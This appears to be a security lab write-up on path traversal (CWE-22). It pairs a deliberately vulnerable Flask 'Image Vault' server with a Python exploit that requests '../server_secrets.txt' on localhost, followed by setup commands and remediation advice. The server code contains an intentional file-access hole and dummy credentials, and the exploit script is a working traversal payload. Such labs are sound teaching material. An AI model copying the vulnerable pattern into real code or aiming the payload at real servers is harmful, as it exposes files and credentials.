Share
## https://sploitus.com/exploit?id=9C0C7C33-F42D-5F71-8C4B-8752A0D5974D
# OS Path Traversal & System File Exfiltration

## ๐ŸŽฏ Executive Summary
This laboratory demonstrates **Local File Inclusion (LFI)** through **Path Traversal (CWE-22)**. It showcases how an attacker can leverage unvalidated input to "escape" the web root directory and interact directly with the server's underlying operating system. This is a critical "System-Level" vulnerability that often leads to the exposure of SSH keys, database credentials, and environmental secrets.



---

## ๐Ÿ—๏ธ Technical Architecture

### 1. The Vulnerable Asset (`vulnerable_server.py`)
The server simulates a standard enterprise "Image Vault." The critical flaw lies in the `/view` endpoint which uses `os.path.join` on raw user input without verification.

```python
from flask import Flask, request, send_file
import os

app = Flask(__name__)

# Intended restricted directory
IMAGE_DIR = os.path.join(os.getcwd(), 'public_images')

@app.route('/view')
def view_file():
    filename = request.args.get('file')
    
    # FATAL VULNERABILITY: Blindly joining user input
    # An attacker can use '../' to escape IMAGE_DIR
    file_path = os.path.join(IMAGE_DIR, filename)
    
    try:
        return send_file(file_path)
    except Exception as e:
        return f"Access Denied: {str(e)}"

if __name__ == '__main__':
    # Creating a dummy sensitive file outside the web root to simulate a system file
    with open('server_secrets.txt', 'w') as f:
        f.write("CONFIDENTIAL: DB_PASS=Admin123! | AWS_KEY=AKIA_EXAMPLE_12345")
    app.run(port=5054)
```


###  2. The Exploit Engine (traversal_exploit.py)
This script automates the directory breakout. It bypasses the logical restriction by injecting the ../ (dot-dot-slash) pointer, which instructs the OS to move one level up in the directory hierarchy.
```python
import requests

TARGET = "[http://127.0.0.1:5054/view](http://127.0.0.1:5054/view)"
PAYLOAD = "../server_secrets.txt"

def run_exploit():
    print(f" [*] Targeting File System with payload: {PAYLOAD}")
    response = requests.get(TARGET, params={'file': PAYLOAD})
    
    if response.status_code == 200 and "CONFIDENTIAL" in response.text:
        print("\n[!] CRITICAL: Path Traversal Successful!")
        print(f" [!] Exfiltrated Data: {response.text}")
    else:
        print("\n[-] Attack failed. Check if the server is active.")

if __name__ == "__main__":
    run_exploit()
```
### ๐Ÿ› ๏ธ Detailed Execution Guide
Phase 1: Environment Hardening
To prevent library conflicts, use an isolated Python Virtual Environment:
```bash
# 1. Clone the repository
git clone [https://github.com/this-is-the-invincible-meghnad/Path-Traversal-Lab.git](https://github.com/this-is-the-invincible-meghnad/Path-Traversal-Lab.git)

# 2. Enter the project directory
cd Path-Traversal-Lab

# 3. Create a clean virtual environment
python -m venv venv

# 4. Activate the environment
# For Windows:
.\venv\Scripts\activate
# For Mac/Linux:
source venv/bin/activate

# 5. Install the required security testing libraries
pip install flask requests

# 6. Start the Vulnerable Server
# Open a terminal and run:
python vulnerable_server.py

# 7. Execute the Exploit
# Open a second terminal (ensure venv is active) and run:
python traversal_exploit.py
```
### Launching the Lab
Initialize Server: In Terminal A, run python vulnerable_server.py. The server will create a "secret" file in the root directory that it is not supposed to share.

Execute Breach: In Terminal B, run python traversal_exploit.py. You will see the contents of server_secrets.txt printed directly to your console.

๐Ÿ›ก๏ธ Remediation & Architectural Defense
Relying on "hope" is not a security strategy. To reach a Top 1% security standard, implement the following controls:

Input Normalization: Use os.path.basename() on all user-supplied filenames. This strips out all path information, leaving only the filename itself.

Chroot Jails / Containerization: Run the application in a Docker container with a "Read-Only" filesystem for system directories.

The "Allow-list" Pattern: Instead of letting users request any file, use a database ID (e.g., ?id=105) and map it to a filename on the backend.